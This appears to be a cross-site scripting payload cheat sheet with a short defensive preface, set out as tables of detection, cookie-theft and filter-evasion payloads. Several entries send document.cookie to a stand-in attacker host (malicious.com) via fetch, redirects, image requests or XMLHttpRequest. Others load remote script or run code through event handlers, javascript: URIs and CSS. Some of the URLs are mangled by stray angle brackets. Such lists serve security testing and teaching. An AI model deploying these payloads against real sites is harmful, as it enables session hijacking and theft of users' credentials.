These examples demonstrate various ways an attacker might attempt to execute unauthorized script code in a user's browser. The focus is on how to prevent these attacks through secure coding practices, input validation, and proper output encoding.
These payloads are typically used to confirm the presence of an XSS vulnerability.
| Payload | Description | Injection Context/Mechanism |
|---|---|---|
<script>alert('XSS')</script> |
Displays a simple alert box, verifying that XSS is working. | Standard script tag execution. |
<img src="x" onerror="alert('XSS')"> |
Executes the alert function due to a failed image load. | Event handler within an HTML tag. |
<svg/onload=alert('XSS')> |
Executes the alert function when an SVG graphic loads. | Event handler within an SVG tag. |
"><script>alert('XSS')</script> |
Attempts to break out of an existing HTML attribute/tag and execute a script. | Attribute/Tag closure. |
<body onload=alert('XSS')> |
Executes a script when the body tag loads. | Event handler within the <body> tag. |
<a href="javascript:alert('XSS')">Click me!</a> |
Executes JavaScript code when the user clicks the link. | javascript: pseudo-protocol in an anchor tag. |
onmouseover="alert('XSS')" |
Executes a script when the mouse hovers over an element. | Event handler (requires an element to attach to). |
These payloads are used to access and display or transmit data from the user's current session or environment.
| Payload | Description | Injection Context/Mechanism |
|---|---|---|
<script>alert(document.cookie)</script> |
Shows the user's cookie information in an alert. | Standard script tag execution. |
<script>alert(document.domain)</script> |
Displays the domain information of the page in an alert. | Standard script tag execution. |
<script>fetch("<http://malicious.com/?cookie=>"+document.cookie)</script> |
Steals the user's cookies and sends them to a specified external site. | Fetch API request. |
<script>document.location='<http://malicious.com/?cookie=>' + document.cookie;</script> |
Steals user cookies by redirecting with the cookie in the URL parameter. | Redirection/Location change. |
<script>new Image().src='<http://malicious.com/?data=>' + document.domain;</script> |
Steals the page's domain through an invisible image request. | Image object data transmission. |
<script>xhr=new XMLHttpRequest();xhr.open('GET','<https://malicious.com?cookie='+document.cookie,true>);xhr.send();</script> |
Sends cookie information to a server using AJAX (XMLHttpRequest). | Asynchronous request. |
<script>localStorage.setItem('data', document.cookie);</script> |
Saves cookie information to local storage (persists across sessions). | Web Storage API. |
These payloads utilize less common tags, attributes, or protocols to bypass simple filters or perform more complex actions.
| Payload | Description | Injection Context/Mechanism |
|---|---|---|
<script src="<http://example.com/malicious-code.js>"></script> |
Loads and executes an external JavaScript file from a different server. | External script sourcing. |
<iframe src="javascript:alert('XSS')"> |
Runs JavaScript code within an iframe element. | javascript: pseudo-protocol in an <iframe>. |
<div style="background:url('javascript:alert('XSS')')"></div> |
Executes JavaScript code within a CSS background URL. | CSS property value. |
<embed src="javascript:alert('XSS')"> |
Executes JavaScript code with an embed tag. | javascript: pseudo-protocol in <embed>. |
<style>@import 'javascript:alert("XSS")';</style> |
Executes JavaScript within a CSS style import rule. | CSS @import rule. |
<script>document.domain='malicious.com';</script> |
Changes the page's domain, potentially affecting security policies (e.g., Same-Origin Policy in certain contexts). | Document object modification. |
<script>window.parent.location='<http://malicious.com>';</script> |
Redirects the parent window (if the current window is an iframe) to a malicious site. | Frame-busting/Redirection. |
For those interested in learning more about different XSS vectors and defensive coding practices, these open-source resources can be invaluable (use responsibly for defense and learning):